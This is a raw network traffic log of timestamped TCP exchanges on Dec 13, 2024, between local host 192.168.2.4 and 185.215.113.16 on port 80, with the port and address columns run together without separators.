                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.152508020 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.156116962 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.156172037 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.156219006 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.159894943 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.159943104 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.160006046 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.163803101 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.163855076 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.163880110 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.163921118 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.167548895 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.167685986 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.167747021 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.171427965 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.171478987 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.171560049 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.175345898 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.175390959 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.175416946 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.175455093 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.179095030 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.179205894 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.179258108 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.182944059 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.183057070 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.183131933 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.186784029 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.186830044 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.186856031 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.186896086 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.190664053 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.190828085 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.190995932 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.194551945 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.194664001 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.194739103 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.198355913 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.198385954 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.198407888 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.198437929 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.202172995 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.202284098 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.202341080 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.206012011 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.206115007 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.206186056 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.209852934 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.209992886 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.210056067 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.213738918 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.213814974 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.213866949 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.217669964 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.217767000 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.217839003 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.221453905 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.221544981 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.221601009 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.225191116 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.225238085 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.225265980 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.225307941 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.229074955 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.229161978 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.229221106 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.232861042 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.236526012 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.327552080 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.327575922 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.327640057 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.329296112 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.329355001 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.329415083 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.329451084 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.332535982 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.332577944 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.332659960 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.332695007 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.335783958 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.335838079 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.335886955 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.335925102 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.339257956 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.339274883 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.339323997 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.342233896 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.342302084 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.342327118 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.342364073 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.345325947 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.345379114 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.345529079 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.345567942 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.348397017 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.348465919 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.348493099 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.348530054 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.351546049 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.351561069 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.351587057 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.351604939 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.354244947 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.354321003 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.354351997 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.354388952 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.357136965 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.357182980 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.357245922 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.357281923 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.359978914 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.360024929 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.360078096 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.360114098 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.362883091 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.362910032 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.362930059 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.362948895 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.365664959 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.365727901 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.365751982 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.365787983 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.368509054 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.368557930 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.368621111 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.368659973 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.371285915 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.371330023 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.371423960 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.371459961 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.374174118 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.374188900 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.374222994 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.374243021 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.376929045 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.376995087 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.377023935 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.377065897 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.379807949 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.379856110 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.379894018 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.379934072 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.382673979 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.382735014 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.382790089 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.382832050 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.385472059 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.385529995 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.385637999 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.385679960 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.388369083 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.388437033 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.388478994 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.388511896 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.391159058 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.391204119 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.391252041 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.391293049 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.394032001 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.394098997 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.394169092 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.394170046 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.396869898 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.396923065 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.396934032 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.396970987 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.399677992 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.399768114 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.399785042 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.399823904 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.402487040 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.402533054 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.402607918 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.402646065 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.405325890 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.405369997 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.405405998 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.405500889 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.408173084 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.408220053 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.408281088 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.408318996 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.411082983 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.411155939 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.411185026 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.411223888 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.413862944 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.413918018 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.413945913 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.413985968 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.416779041 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.416830063 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.416831970 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.416868925 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.419507027 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.419552088 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.419609070 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.419646978 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.422365904 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.422426939 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.422435999 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.422466993 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.425378084 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.425447941 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.425506115 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.425549030 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.428216934 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.428229094 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.428262949 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.428281069 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.430875063 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.430922985 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.431003094 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.431040049 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.433785915 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.433825970 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.433849096 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.433893919 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.436563969 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.436609030 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.436638117 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.436676025 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.439563990 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.439583063 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.439619064 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.439635038 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.442259073 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.442296982 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.442342997 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.442380905 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.445094109 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.445159912 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.445204973 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.445240974 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.447943926 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.448005915 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.448012114 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.448054075 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.450731993 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.450772047 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.450789928 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.450824976 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.453583956 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.453668118 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.453773975 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.453814983 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.456476927 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.456520081 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.456588030 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.456628084 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.459270954 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.459326982 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.459418058 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.459454060 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.462130070 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.462178946 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.462229967 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.462260962 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.465018988 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.465095043 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.465096951 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.465131998 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.467921972 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.467964888 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.467994928 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.468031883 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.519634008 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.519649982 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.519692898 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.519726038 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.520606041 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.520663977 CET4978980192.168.2.4185.215.113.16
